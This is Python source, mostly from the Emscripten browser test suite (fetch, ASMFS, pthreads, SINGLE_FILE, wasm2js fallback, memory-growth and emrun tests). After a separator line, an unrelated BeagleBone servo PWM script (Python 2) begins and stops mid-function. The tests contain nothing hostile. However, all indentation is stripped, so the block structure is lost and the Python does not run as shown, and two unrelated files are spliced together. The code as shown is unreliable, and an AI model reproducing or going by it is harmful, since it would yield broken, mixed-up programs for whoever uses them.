@no_wasm_backend("emscripten_fetch_wait uses an asm.js based web worker")
@requires_threads
def test_fetch_sync_fetch_in_main_thread(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_fetch_in_main_thread.cpp', expected='0', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_idb_store(self):
self.btest('fetch/idb_store.cpp', expected='0', args=['-s', 'USE_PTHREADS', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_idb_delete(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/idb_delete.cpp', expected='0', args=['-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_hello_file(self):
# Test basic file loading and the valid character set for files.
ensure_dir('dirrey')
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), os.path.join(self.get_dir(), 'dirrey', 'hello file !#$%&\'()+,-.;=@[]^_`{}~ %%.txt'))
self.btest_exit('asmfs/hello_file.cpp', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_read_file_twice(self):
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), 'hello_file.txt')
self.btest_exit('asmfs/read_file_twice.cpp', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_fopen_write(self):
self.btest_exit('asmfs/fopen_write.cpp', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_mkdir_create_unlink_rmdir(self):
self.btest('cstdio/test_remove.cpp', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_dirent_test_readdir(self):
self.btest('dirent/test_readdir.c', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_dirent_test_readdir_empty(self):
self.btest('dirent/test_readdir_empty.c', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_close(self):
self.btest_exit(path_from_root('tests', 'unistd', 'close.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_access(self):
self.btest_exit(path_from_root('tests', 'unistd', 'access.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_unlink(self):
# TODO: Once symlinks are supported, remove -DNO_SYMLINK=1
self.btest_exit(path_from_root('tests', 'unistd', 'unlink.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-DNO_SYMLINK=1'])
@requires_asmfs
@requires_threads
def test_asmfs_test_fcntl_open(self):
self.btest('fcntl/test_fcntl_open.c', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_relative_paths(self):
self.btest_exit('asmfs/relative_paths.cpp', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_threads
def test_pthread_locale(self):
for args in [
[],
['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'],
]:
print("Testing with: ", args)
self.btest('pthread/test_pthread_locale.c', expected='1', args=args)
# Tests the Emscripten HTML5 API emscripten_set_canvas_element_size() and emscripten_get_canvas_element_size() functionality in singlethreaded programs.
def test_emscripten_set_canvas_element_size(self):
self.btest('emscripten_set_canvas_element_size.c', expected='1')
# Test that emscripten_get_device_pixel_ratio() is callable from pthreads (and proxies to main thread to obtain the proper window.devicePixelRatio value).
@requires_threads
def test_emscripten_get_device_pixel_ratio(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest('emscripten_get_device_pixel_ratio.c', expected='1', args=args)
# Tests that emscripten_run_script() variants of functions work in pthreads.
@requires_threads
def test_pthread_run_script(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_script.cpp'), expected='1', args=['-O3'] + args)
# Tests emscripten_set_canvas_element_size() and OffscreenCanvas functionality in different build configurations.
@requires_threads
@requires_graphics_hardware
def test_emscripten_animate_canvas_element_size(self):
for args in [
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_EXPLICIT_CONTEXT_SWAP=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_MANUALLY_SET_ELEMENT_CSS_SIZE=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'OFFSCREENCANVAS_SUPPORT'],
]:
cmd = ['-lGL', '-O3', '-g2', '--shell-file', path_from_root('tests', 'canvas_animate_resize_shell.html'), '-s', 'GL_DEBUG', '--threadprofiler'] + args
print(' '.join(cmd))
self.btest('canvas_animate_resize.cpp', expected='1', args=cmd)
# Tests the absolute minimum pthread-enabled application.
@requires_threads
def test_pthread_hello_thread(self):
for opts in [[], ['-O3']]:
for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')]]:
self.btest(path_from_root('tests', 'pthread', 'hello_thread.c'), expected='1', args=['-s', 'USE_PTHREADS'] + modularize + opts)
# Tests that a pthreads build of -s MINIMAL_RUNTIME=1 works well in different build modes
def test_minimal_runtime_hello_pthread(self):
for opts in [[], ['-O3']]:
for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule']]:
self.btest(path_from_root('tests', 'pthread', 'hello_thread.c'), expected='1', args=['-s', 'MINIMAL_RUNTIME', '-s', 'USE_PTHREADS'] + modularize + opts)
# Tests memory growth in pthreads mode, but still on the main thread.
@requires_threads
def test_pthread_growth_mainthread(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_memory_growth_mainthread.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=32MB', '-s', 'MAXIMUM_MEMORY=256MB'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'PROXY_TO_PTHREAD'])
# Tests memory growth in a pthread.
@requires_threads
def test_pthread_growth(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_memory_growth.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=32MB', '-s', 'MAXIMUM_MEMORY=256MB', '-g'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'ASSERTIONS'])
run(['-s', 'PROXY_TO_PTHREAD'])
# Tests that time in a pthread is relative to the main thread, so measurements
# on different threads are still monotonic, as if checking a single central
# clock.
@requires_threads
def test_pthread_reltime(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_reltime.cpp'), expected='3', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Tests that it is possible to load the main .js file of the application manually via a Blob URL, and still use pthreads.
@requires_threads
def test_load_js_from_blob_with_pthreads(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
self.compile_btest([path_from_root('tests', 'pthread', 'hello_thread.c'), '-s', 'USE_PTHREADS', '-o', 'hello_thread_with_blob_url.js'])
shutil.copyfile(path_from_root('tests', 'pthread', 'main_js_as_blob_loader.html'), 'hello_thread_with_blob_url.html')
self.run_browser('hello_thread_with_blob_url.html', 'hello from thread!', '/report_result?1')
# Tests that base64 utils work in browser with no native atob function
def test_base64_atob_fallback(self):
create_test_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
return 0;
}
''')
# generate a dummy file
create_test_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-s', 'EXIT_RUNTIME', '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file', '-s', 'SINGLE_FILE'])
create_test_file('a.html', '''
<script>
atob = undefined;
fetch = undefined;
</script>
<script src="a.out.js"></script>
<script>
var foo = Foo();
</script>
''')
self.run_browser('a.html', '...', '/report_result?exit:0')
# Tests that SINGLE_FILE works as intended in generated HTML (with and without Worker)
def test_single_file_html(self):
self.btest('single_file_static_initializer.cpp', '19', args=['-s', 'SINGLE_FILE'], also_proxied=True)
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.mem')
# Tests that SINGLE_FILE works as intended in generated HTML with MINIMAL_RUNTIME
def test_minimal_runtime_single_file_html(self):
for wasm in [0, 1]:
for opts in [[], ['-O3']]:
self.btest('single_file_static_initializer.cpp', '19', args=opts + ['-s', 'MINIMAL_RUNTIME', '-s', 'SINGLE_FILE', '-s', 'WASM=' + str(wasm)])
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.asm.js')
self.assertNotExists('test.mem')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that SINGLE_FILE works when built with ENVIRONMENT=web and Closure enabled (#7933)
def test_single_file_in_web_environment_with_closure(self):
self.btest('minimal_hello.c', '0', args=['-s', 'SINGLE_FILE', '-s', 'ENVIRONMENT=web', '-O2', '--closure', '1'])
# Tests that SINGLE_FILE works as intended with locateFile
def test_single_file_locate_file(self):
for wasm_enabled in [True, False]:
args = [path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.js', '-s', 'SINGLE_FILE']
if not wasm_enabled:
args += ['-s', 'WASM=0']
self.compile_btest(args)
create_test_file('test.html', '''
<script>
var Module = {
locateFile: function (path) {
if (path.indexOf('data:') === 0) {
throw new Error('Unexpected data URI.');
}
return path;
}
};
</script>
<script src="test.js"></script>
''')
self.run_browser('test.html', None, '/report_result?0')
# Tests that SINGLE_FILE works as intended in a Worker in JS output
def test_single_file_worker_js(self):
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'SINGLE_FILE'])
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
self.assertExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that pthreads code works as intended in a Worker. That is, a pthreads-using
# program can run either on the main thread (normal tests) or when we start it in
# a Worker in this test (in that case, both the main application thread and the worker threads
# are all inside Web Workers).
@requires_threads
def test_pthreads_started_in_worker(self):
self.compile_btest([path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), '-o', 'test.js', '-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
create_test_file('test.html', '''
<script>
new Worker('test.js');
</script>
''')
self.run_browser('test.html', None, '/report_result?0')
def test_access_file_after_heap_resize(self):
create_test_file('test.txt', 'hello from file')
self.compile_btest([path_from_root('tests', 'access_file_after_heap_resize.c'), '-s', 'ALLOW_MEMORY_GROWTH', '--preload-file', 'test.txt', '-o', 'page.html'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
# with separate file packager invocation
self.run_process([FILE_PACKAGER, 'data.data', '--preload', 'test.txt', '--js-output=' + 'data.js'])
self.compile_btest([path_from_root('tests', 'access_file_after_heap_resize.c'), '-s', 'ALLOW_MEMORY_GROWTH', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
def test_unicode_html_shell(self):
create_test_file('main.cpp', r'''
int main() {
REPORT_RESULT(0);
return 0;
}
''')
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('Emscripten-Generated Code', 'Emscripten-Generated Emoji 😅'))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-o', 'test.html'])
self.run_browser('test.html', None, '/report_result?0')
# Tests the functionality of the emscripten_thread_sleep() function.
@requires_threads
def test_emscripten_thread_sleep(self):
self.btest(path_from_root('tests', 'pthread', 'emscripten_thread_sleep.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["print"]'])
# Tests that Emscripten-compiled applications can be run from a relative path in browser that is different than the address of the current page
def test_browser_run_from_different_directory(self):
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.html', '-O3'])
ensure_dir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
src = open('test.html').read()
# Make sure JS is loaded from subdirectory
create_test_file('test-subdir.html', src.replace('test.js', 'subdir/test.js'))
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but asynchronous because of `-s MODULARIZE=1`
def test_browser_run_from_different_directory_async(self):
for args, creations in [
(['-s', 'MODULARIZE'], [
'Module();', # documented way for using modularize
'new Module();' # not documented as working, but we support it
]),
]:
print(args)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.js', '-O3'] + args)
ensure_dir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
for creation in creations:
print(creation)
# Make sure JS is loaded from subdirectory
create_test_file('test-subdir.html', '''
<script src="subdir/test.js"></script>
<script>
%s
</script>
''' % creation)
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but
# also also we eval the initial code, so currentScript is not present. That prevents us
# from finding the file in a subdir, but here we at least check we do not regress compared to the
# normal case of finding in the current dir.
def test_browser_modularize_no_current_script(self):
# test both modularize (and creating an instance) and modularize-instance
# (which creates by itself)
for path, args, creation in [
([], ['-s', 'MODULARIZE'], 'Module();'),
(['subdir'], ['-s', 'MODULARIZE'], 'Module();'),
]:
print(path, args, creation)
filesystem_path = os.path.join('.', *path)
ensure_dir(filesystem_path)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.js'] + args)
shutil.move('test.js', os.path.join(filesystem_path, 'test.js'))
shutil.move('test.wasm', os.path.join(filesystem_path, 'test.wasm'))
open(os.path.join(filesystem_path, 'test.html'), 'w').write('''
<script>
setTimeout(function() {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'test.js', false);
xhr.send(null);
eval(xhr.responseText);
%s
}, 1);
</script>
''' % creation)
self.run_browser('/'.join(path + ['test.html']), None, '/report_result?0')
def test_emscripten_request_animation_frame(self):
self.btest(path_from_root('tests', 'emscripten_request_animation_frame.c'), '0')
def test_emscripten_request_animation_frame_loop(self):
self.btest(path_from_root('tests', 'emscripten_request_animation_frame_loop.c'), '0')
def test_request_animation_frame(self):
self.btest('request_animation_frame.cpp', '0', also_proxied=True)
@requires_threads
def test_emscripten_set_timeout(self):
self.btest(path_from_root('tests', 'emscripten_set_timeout.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_emscripten_set_timeout_loop(self):
self.btest(path_from_root('tests', 'emscripten_set_timeout_loop.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
def test_emscripten_set_immediate(self):
self.btest(path_from_root('tests', 'emscripten_set_immediate.c'), '0')
def test_emscripten_set_immediate_loop(self):
self.btest(path_from_root('tests', 'emscripten_set_immediate_loop.c'), '0')
@requires_threads
def test_emscripten_set_interval(self):
self.btest(path_from_root('tests', 'emscripten_set_interval.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Test emscripten_performance_now() and emscripten_date_now()
@requires_threads
def test_emscripten_performance_now(self):
self.btest(path_from_root('tests', 'emscripten_performance_now.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_embind_with_pthreads(self):
self.btest('embind_with_pthreads.cpp', '1', args=['--bind', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
def test_embind_with_asyncify(self):
self.btest('embind_with_asyncify.cpp', '1', args=['--bind', '-s', 'ASYNCIFY'])
# Test emscripten_console_log(), emscripten_console_warn() and emscripten_console_error()
def test_emscripten_console_log(self):
self.btest(path_from_root('tests', 'emscripten_console_log.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_console_log_pre.js')])
def test_emscripten_throw_number(self):
self.btest(path_from_root('tests', 'emscripten_throw_number.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_throw_number_pre.js')])
def test_emscripten_throw_string(self):
self.btest(path_from_root('tests', 'emscripten_throw_string.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_throw_string_pre.js')])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a minimal console.log() application
def test_closure_in_web_only_target_environment_console_log(self):
self.btest('minimal_hello.c', '0', args=['-s', 'ENVIRONMENT=web', '-O3', '--closure', '1'])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a small WebGL application
@requires_graphics_hardware
def test_closure_in_web_only_target_environment_webgl(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1'])
def test_no_declare_asm_module_exports_asmjs(self):
for minimal_runtime in [[], ['-s', 'MINIMAL_RUNTIME']]:
self.btest(path_from_root('tests', 'declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1', '-s', 'WASM=0'] + minimal_runtime)
def test_no_declare_asm_module_exports_wasm_minimal_runtime(self):
self.btest(path_from_root('tests', 'declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1', '-s', 'MINIMAL_RUNTIME'])
# Tests that the different code paths in src/shell_minimal_runtime.html all work ok.
def test_minimal_runtime_loader_shell(self):
args = ['-s', 'MINIMAL_RUNTIME=2']
for wasm in [[], ['-s', 'WASM=0', '--memory-init-file', '0'], ['-s', 'WASM=0', '--memory-init-file', '1'], ['-s', 'SINGLE_FILE'], ['-s', 'WASM=0', '-s', 'SINGLE_FILE']]:
for modularize in [[], ['-s', 'MODULARIZE']]:
print(str(args + wasm + modularize))
self.btest('minimal_hello.c', '0', args=args + wasm + modularize)
# Tests that -s MINIMAL_RUNTIME=1 works well in different build modes
def test_minimal_runtime_hello_world(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME_STREAMING_WASM_COMPILATION', '--closure', '1'], ['-s', 'MINIMAL_RUNTIME_STREAMING_WASM_INSTANTIATION', '--closure', '1']]:
self.btest(path_from_root('tests', 'small_hello_world.c'), '0', args=args + ['-s', 'MINIMAL_RUNTIME'])
@requires_threads
def test_offset_converter(self, *args):
try:
self.btest_exit(path_from_root('tests', 'browser', 'test_offset_converter.c'), '1', args=['-s', 'USE_OFFSET_CONVERTER', '-g4', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
except Exception as e:
# dump the wasm file; this is meant to help debug #10539 on the bots
print(self.run_process([os.path.join(building.get_binaryen_bin(), 'wasm-opt'), 'test.wasm', '-g', '--print', '-all'], stdout=PIPE).stdout)
raise e
# Tests emscripten_unwind_to_js_event_loop() behavior
def test_emscripten_unwind_to_js_event_loop(self, *args):
self.btest(path_from_root('tests', 'browser', 'test_emscripten_unwind_to_js_event_loop.c'), '1', args=['-s', 'NO_EXIT_RUNTIME'])
def test_wasm2js_fallback(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME']]:
self.compile_btest([path_from_root('tests', 'small_hello_world.c'), '-s', 'WASM=2', '-o', 'test.html'] + args)
# First run with WebAssembly support enabled
# Move the Wasm2js fallback away to test it is not accidentally getting loaded.
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?0')
os.rename('test.wasm.js.unused', 'test.wasm.js')
# Then disable WebAssembly support in VM, and try again.. Should still work with Wasm2JS fallback.
html = open('test.html', 'r').read()
html = html.replace('<body>', '<body><script>delete WebAssembly;</script>')
open('test.html', 'w').write(html)
os.remove('test.wasm') # Also delete the Wasm file to test that it is not attempted to be loaded.
self.run_browser('test.html', 'hello!', '/report_result?0')
def test_wasm2js_fallback_on_wasm_compilation_failure(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME']]:
self.compile_btest([path_from_root('tests', 'small_hello_world.c'), '-s', 'WASM=2', '-o', 'test.html'] + args)
# Run without the .wasm.js file present: with Wasm support, the page should still run
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?0')
# Restore the .wasm.js file, then corrupt the .wasm file, that should trigger the Wasm2js fallback to run
os.rename('test.wasm.js.unused', 'test.wasm.js')
shutil.copyfile('test.js', 'test.wasm')
self.run_browser('test.html', 'hello!', '/report_result?0')
def test_system(self):
self.btest(path_from_root('tests', 'system.c'), '0')
# Tests that it is possible to hook into/override a symbol defined in a system library.
@requires_graphics_hardware
def test_override_system_js_lib_symbol(self):
# This test verifies it is possible to override a symbol from WebGL library.
# When WebGL is implicitly linked in, the implicit linking should happen before any user --js-libraries, so that they can adjust
# the behavior afterwards.
self.btest(path_from_root('tests', 'test_override_system_js_lib_symbol.c'),
expected='5121',
args=['--js-library', path_from_root('tests', 'test_override_system_js_lib_symbol.js')])
# When WebGL is explicitly linked to in strict mode, the linking order on command line should enable overriding.
self.btest(path_from_root('tests', 'test_override_system_js_lib_symbol.c'),
expected='5121',
args=['-s', 'AUTO_JS_LIBRARIES=0', '-lwebgl.js', '--js-library', path_from_root('tests', 'test_override_system_js_lib_symbol.js')])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_4GB(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we can allocate in the 2-4GB range, if we enable growth and
# set the max appropriately
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=4GB']
self.do_run_in_out_file_test('tests', 'browser', 'test_4GB.cpp', js_engines=[config.V8_ENGINE])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_2GB_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that growth doesn't go beyond 2GB without the max being set for that,
# and that we can catch an allocation failure exception for that
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=2GB']
self.do_run_in_out_file_test('tests', 'browser', 'test_2GB_fail.cpp', js_engines=[config.V8_ENGINE])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_4GB_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we properly report an allocation error that would overflow over
# 4GB.
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=4GB', '-s', 'ABORTING_MALLOC=0']
self.do_run_in_out_file_test('tests', 'browser', 'test_4GB_fail.cpp', js_engines=[config.V8_ENGINE])
@disabled("only run this manually, to test for race conditions")
@parameterized({
'normal': ([],),
'assertions': (['-s', 'ASSERTIONS'],)
})
@requires_threads
def test_manual_pthread_proxy_hammer(self, args):
# the specific symptom of the hang that was fixed is that the test hangs
# at some point, using 0% CPU. often that occured in 0-200 iterations, but
# you may want to adjust "ITERATIONS".
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxy_hammer.cpp'),
expected='0',
args=['-s', 'USE_PTHREADS', '-O2', '-s', 'PROXY_TO_PTHREAD',
'-DITERATIONS=1024', '-g1'] + args,
timeout=10000,
# don't run this with the default extra_tries value, as this is
# *meant* to notice something random, a race condition.
extra_tries=0)
class emrun(RunnerCore):
def test_emrun_info(self):
if not has_browser():
self.skipTest('need a browser')
result = self.run_process([path_from_root('emrun'), '--system_info', '--browser_info'], stdout=PIPE).stdout
assert 'CPU' in result
assert 'Browser' in result
assert 'Traceback' not in result
result = self.run_process([path_from_root('emrun'), '--list_browsers'], stdout=PIPE).stdout
assert 'Traceback' not in result
def test_emrun(self):
self.run_process([EMCC, path_from_root('tests', 'test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
if not has_browser():
self.skipTest('need a browser')
# We cannot run emrun from the temp directory the suite will clean up afterwards, since the
# browser that is launched will have that directory as startup directory, and the browser will
# not close as part of the test, pinning down the cwd on Windows and it wouldn't be possible to
# delete it. Therefore switch away from that directory before launching.
os.chdir(path_from_root())
args_base = [path_from_root('emrun'), '--timeout', '30', '--safe_firefox_profile',
'--kill_exit', '--port', '6939', '--verbose',
'--log_stdout', self.in_dir('stdout.txt'),
'--log_stderr', self.in_dir('stderr.txt')]
# Verify that trying to pass argument to the page without the `--` separator will
# generate an actionable error message
err = self.expect_fail(args_base + ['--foo'])
self.assertContained('error: unrecognized arguments: --foo', err)
self.assertContained('remember to add `--` between arguments', err)
if EMTEST_BROWSER is not None:
# If EMTEST_BROWSER carried command line arguments to pass to the browser,
# (e.g. "firefox -profile /path/to/foo") those can't be passed via emrun,
# so strip them out.
browser_cmd = shlex.split(EMTEST_BROWSER)
browser_path = browser_cmd[0]
args_base += ['--browser', browser_path]
if len(browser_cmd) > 1:
browser_args = browser_cmd[1:]
if 'firefox' in browser_path and ('-profile' in browser_args or '--profile' in browser_args):
# emrun uses its own -profile, strip it out
parser = argparse.ArgumentParser(add_help=False) # otherwise it throws with -headless
parser.add_argument('-profile')
parser.add_argument('--profile')
browser_args = parser.parse_known_args(browser_args)[1]
if browser_args:
args_base += ['--browser_args', ' ' + ' '.join(browser_args)]
for args in [
args_base,
args_base + ['--private_browsing', '--port', '6941']
]:
args += [self.in_dir('hello_world.html'), '--', '1', '2', '--3']
print(shared.shlex_join(args))
proc = self.run_process(args, check=False)
self.assertEqual(proc.returncode, 100)
stdout = open(self.in_dir('stdout.txt'), 'r').read()
stderr = open(self.in_dir('stderr.txt'), 'r').read()
self.assertContained('argc: 4', stdout)
self.assertContained('argv[3]: --3', stdout)
self.assertContained('hello, world!', stdout)
self.assertContained('Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~', stdout)
self.assertContained('Testing char sequences: %20%21 ä', stdout)
self.assertContained('hello, error stream!', stderr)
|
servoTest_loop_thread.py
|
#from: http://www.toptechboy.com/tutorial/beaglebone-black-lesson-6-control-pwm-signals-on-gpio-pins-from-python/
import Adafruit_BBIO.PWM as PWM
from time import sleep
import threading
#import Adafruit_BBIO.GPIO as GPIO
#from Adafruit_BBIO.PWM import PWM
#GPIO.setup("P8_13", GPIO.OUT)
steps = 7
SERVO_1="P9_14"
SERVO_2="P9_16"
pwm_min = 5
pwm_max = 10
freq = 50 #Hz
start_duty = 0
PWM.start(SERVO_1,0,freq)
PWM.start(SERVO_2,0,freq)
angle = 0
def setServo_1(angle):
if angle < 0:
angle = 0
elif angle > 180:
angle = 180
duty = angle/36.0+ pwm_min
if duty > pwm_max:
duty = pwm_max
PWM.set_duty_cycle(SERVO_1, duty)
print "duty 1", duty
def setServo_2(angle):
if angle < 0:
angle = 0
elif angle > 180:
angle = 180
